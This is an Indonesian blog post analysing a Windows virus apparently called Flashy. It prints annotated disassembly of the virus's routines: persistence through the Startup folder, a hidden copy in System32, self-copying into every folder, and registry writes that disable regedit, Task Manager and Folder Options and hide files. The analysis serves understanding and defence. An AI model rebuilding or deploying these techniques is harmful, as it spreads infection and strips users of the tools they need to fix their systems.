00401490 |. FF15 08604000 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
BARIS PEMICU FILE
Nah untuk penggandaan, virus akan menjalankan file di bawah ini, yaitu dengan cara menyalin file systemID.pif ke
"%s\Documents and Settings\%s\Start Menu\Programs\Startup\systemID.pif dimana %s adalah user yang ada di windows dan drive dimana windows terinstall.
004013DB |. 68 B0704000 PUSH Flashyun.004070B0 ; ASCII "%s\Documents and Settings\%s\Start Menu\Programs\Startup\systemID.pif"
004013E0 |. 51 PUSH ECX
004013E1 |. E8 48060000 CALL Flashyun.00401A2E
004013E6 |. 8B3D 2C604000 MOV EDI,DWORD PTR DS:[<&KERNEL32.CopyFil>; kernel32.CopyFileA
004013EC |. 83C4 1C ADD ESP,1C
004013EF |. 8D9424 5002000>LEA EDX,DWORD PTR SS:[ESP+250]
004013F6 |. 53 PUSH EBX ; /FailIfExists
004013F7 |. 52 PUSH EDX ; |NewFileName
004013F8 |. 68 207B4000 PUSH Flashyun.00407B20 ; |ExistingFileName = ""
004013FD |. FFD7 CALL EDI ; \CopyFileA
Nah pada baris berikut ini adalah baris dimana virus akan men-cek apakah file induknya telah ada di c:\Windows\System32 atau belum, jika belum ada maka virus mengkopi file induk bernama flashy.exe ke c:\Windows\System32 dan men-set atribut file tersebut adalah hidden, sehingga mereka tidak mengetahui dimana letak file induk virus
00401431 |. 68 A4704000 PUSH Flashyun.004070A4 ; /StringToAdd = "\Flashy.exe"
00401436 |. 51 PUSH ECX ; |ConcatString
00401437 |. FF15 48604000 CALL DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; \lstrcatA
0040143D |. 8D5424 48 LEA EDX,DWORD PTR SS:[ESP+48]
00401441 |. 53 PUSH EBX
00401442 |. 52 PUSH EDX
00401443 |. 68 207B4000 PUSH Flashyun.00407B20
00401448 |. FFD7 CALL EDI
0040144A |. 8D4424 48 LEA EAX,DWORD PTR SS:[ESP+48]
0040144E |. 6A 02 PUSH 2 ; /FileAttributes = HIDDEN
00401450 |. 50 PUSH EAX ; |FileName
00401451 |. FF15 24604000 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
Di baris ini si virus melakukan pencarian terhadap folder yang akan ditulari oleh file virus. Maksudnya mengcopy ke dalam folder tersebut file virus yang diberi nama sesuai dengan nama folder tersebut
00401504 |. BF 44714000 MOV EDI,Flashyun.00407144 ; ASCII "\*.*"
00401509 |. 83C9 FF OR ECX,FFFFFFFF
0040150C |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040150E |. F7D1 NOT ECX
00401510 |. 2BF9 SUB EDI,ECX
00401512 |. 8BF7 MOV ESI,EDI
00401514 |. 8BD9 MOV EBX,ECX
00401516 |. 8BFA MOV EDI,EDX
00401518 |. 83C9 FF OR ECX,FFFFFFFF
0040151B |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040151D |. 8BCB MOV ECX,EBX
0040151F |. 4F DEC EDI
00401520 |. C1E9 02 SHR ECX,2
00401523 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401525 |. 8BCB MOV ECX,EBX
00401527 |. 8D8424 1801000>LEA EAX,DWORD PTR SS:[ESP+118]
0040152E |. 83E1 03 AND ECX,3
00401531 |. 50 PUSH EAX ; /pFindFileData
00401532 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
00401534 |. 8D8C24 5C02000>LEA ECX,DWORD PTR SS:[ESP+25C] ; |
0040153B |. 51 PUSH ECX ; |FileName
0040153C |. FF15 38604000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstF>; \FindFirstFileA
00401542 |. 8B1D 4C604000 MOV EBX,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
00401548 |. 8B2D 24604000 MOV EBP,DWORD PTR DS:[<&KERNEL32.SetFile>; kernel32.SetFileAttributesA
0040154E |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX
BARIS PENGGANDAAN FILE
Pada baris berikut virus melakukan penggandaan file yang ada di tiap – tiap folder. Misalnya anda mempunyai folder bernama buah dan di dalam folder buah ada folder pisang, apel dan cerry. Maka di tiap – tiap folder akan ada file virus sesuai nama foldernya, jadi di folder buah ada file bernama buah.exe, di folder pisang ada file virus bernama pisang.exe dan di folder apel dan cerry ada file bernama apel.exe dan cerry.exe…
00401710 |. 68 4C714000 PUSH Flashyun.0040714C ; ASCII "\%s.exe"
00401715 |. 52 PUSH EDX
00401716 |. E8 13030000 CALL Flashyun.00401A2E
0040171B |. 8DBC24 1C01000>LEA EDI,DWORD PTR SS:[ESP+11C]
00401722 |. 83C9 FF OR ECX,FFFFFFFF
00401725 |. 33C0 XOR EAX,EAX
00401727 |. 83C4 0C ADD ESP,0C
0040172A |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040172C |. F7D1 NOT ECX
0040172E |. 2BF9 SUB EDI,ECX
00401730 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
00401734 |. 8BF7 MOV ESI,EDI
00401736 |. 8BD9 MOV EBX,ECX
00401738 |. 8BFA MOV EDI,EDX
0040173A |. 83C9 FF OR ECX,FFFFFFFF
0040173D |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0040173F |. 8BCB MOV ECX,EBX
00401741 |. 4F DEC EDI
00401742 |. C1E9 02 SHR ECX,2
00401745 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401747 |. 8BCB MOV ECX,EBX
00401749 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0040174D |. 83E1 03 AND ECX,3
00401750 |. 6A 01 PUSH 1 ; /FailIfExists = TRUE
00401752 |. 50 PUSH EAX ; |NewFileName
00401753 |. 68 207B4000 PUSH Flashyun.00407B20 ; |ExistingFileName = ""
00401758 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>; |
0040175A |. FF15 2C604000 CALL DWORD PTR DS:[<&KERNEL32.CopyFileA>>; \CopyFileA
00401760 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
00401764 |. 6A 01 PUSH 1 ; /FileAttributes = READONLY
00401766 |. 51 PUSH ECX ; |FileName
00401767 |. FF15 24604000 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
BARIS KODE PERTAHANAN
Nah virus menjalankan baris pertahanan dengan cara menulisi registry windows di alamat tertentu, misalnya pada baris berikut, virus akan menulis di registry windows pada alamat :
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
Yang berguna untuk mengunci regedit dan ctrl+alt+del
0040181A . 68 5C724000 PUSH Flashyun.0040725C ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System"
0040181F . 68 01000080 PUSH 80000001
00401824 . FFD7 CALL EDI
00401826 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0040182A . 6A 04 PUSH 4
0040182C . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
00401830 . 51 PUSH ECX
00401831 . 6A 04 PUSH 4
00401833 . 6A 00 PUSH 0
00401835 . 68 44724000 PUSH Flashyun.00407244 ; ASCII "DisableRegistryTools"
0040183A . 52 PUSH EDX
0040183B . FFD6 CALL ESI
0040183D . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00401841 . 6A 04 PUSH 4
00401843 . 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14]
00401847 . 50 PUSH EAX
00401848 . 6A 04 PUSH 4
0040184A . 6A 00 PUSH 0
0040184C . 68 34724000 PUSH Flashyun.00407234 ; ASCII "DisableTaskMgr"
Dan untuk menyembunyikan folder option virus menjalankan atau menulisi registry windows di alamat:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
00401867 . 68 F8714000 PUSH Flashyun.004071F8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
0040186C . 68 01000080 PUSH 80000001
00401871 . FFD7 CALL EDI
00401873 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
00401877 . 6A 04 PUSH 4
00401879 . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
0040187D . 51 PUSH ECX
0040187E . 6A 04 PUSH 4
00401880 . 6A 00 PUSH 0
00401882 . 68 E8714000 PUSH Flashyun.004071E8 ; ASCII "NoFolderOptions"
Untuk menyembunyikan ekstensi file dan menyembunyikan file beratribut hidden yang ada di registry windows dan alamat:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, HidefileExt
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, Hidden
Virus menjalankan kode baris berikut ini:
0040189D . 68 AC714000 PUSH Flashyun.004071AC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
004018A2 . 68 01000080 PUSH 80000001
004018A7 . FFD7 CALL EDI
004018A9 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
004018AD . 6A 04 PUSH 4
004018AF . 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
004018B3 . 52 PUSH EDX
004018B4 . 6A 04 PUSH 4
004018B6 . 6A 00 PUSH 0
004018B8 . 68 A0714000 PUSH Flashyun.004071A0 ; ASCII "HideFileExt"
004018BD . 50 PUSH EAX
004018BE . FFD6 CALL ESI
004018C0 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
004018C4 . 6A 04 PUSH 4
004018C6 . 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
004018CA . 51 PUSH ECX
004018CB . 6A 04 PUSH 4
004018CD . 6A 00 PUSH 0
004018CF . 68 98714000 PUSH Flashyun.00407198 ; ASCII "Hidden"
Sedangkan untuk melakukan sharing direktori windows yang terbuka pada alamat registry:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess, Start
Virus menjalankan script dibawah ini:
004018FA . 68 68714000 PUSH Flashyun.00407168 ; ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess"
004018FF . 68 02000080 PUSH 80000002
00401904 . FFD7 CALL EDI
00401906 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040190A . 6A 04 PUSH 4
0040190C . 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00401910 . 52 PUSH EDX
00401911 . 6A 04 PUSH 4
00401913 . 6A 00 PUSH 0
00401915 . 68 60714000 PUSH Flashyun.00407160 ; ASCII "Start"
(c) virologi
Postingan
0 komentar:
Posting Komentar